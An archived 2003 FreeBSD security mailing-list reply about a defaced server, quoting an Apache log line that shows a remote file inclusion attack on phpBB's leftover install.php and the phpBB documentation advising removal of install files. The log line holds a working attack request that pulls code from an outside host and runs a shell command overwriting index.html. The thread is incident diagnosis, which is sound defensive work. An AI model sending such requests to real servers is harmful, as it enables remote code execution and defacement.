Date: Fri, 07 Nov 2003 13:48:42 -0600 From: "Kevin D. Kinsey, DaleCo, S.P." <kdk@daleco.biz> To: Miha Nedok <mike@voyager.unix-systems.net> Cc: freebsd-security@freebsd.org Subject: Re: hack ? - urgent - false FreeBSD alarm Message-ID: <3FABF71A.7000903@daleco.biz> In-Reply-To: <20031107132650.H19165@voyager.zrcalo.si> References: <20031107125529.R19165@voyager.zrcalo.si> <3FAB8B3A.7020908@remotelab.org> <20031107132650.H19165@voyager.zrcalo.si>
next in thread | previous in thread | raw e-mail | index | archive | help
Miha Nedok wrote: >Hi ! > >It is phpBB related. I found in logs: >200.211.35.130 - - [07/Nov/2003:11:27:01 +0100] "GET >/forum/install.php?phpbb_root_dir=http://www.creatividade.hpg.com.br/&cmd=cd%20..;cd%20..;cd%20www.site- >name.si;echo%20IR4DEX%20ownz%20you%20FreeBSD%20-%20contato:%20ir4dex@hotmail.com%20>%20index.html >HTTP/1.1" 200 904 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" > > > >I just did chmod 000 `find -name 'install.php'` for a workaround. > >Apache is latest: Nov 3 18:08 apache+mod_ssl-1.3.28+2.8.15_2 . > > > >-Miha > > > > > From ~/phpp/docs/Install.html: _6. Important post-Install tasks for all installation methods_ Once you have succssfully installed phpBB 2.0.0 you *MUST* ensure you remove install.php, upgrade.php and update_to_FINAL.php files. Leaving these in place is a _very serious potential security issue_. Additionally you may delete the db/schemas, docs/ and contrib/ directories if you wish.
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?3FABF71A.7000903>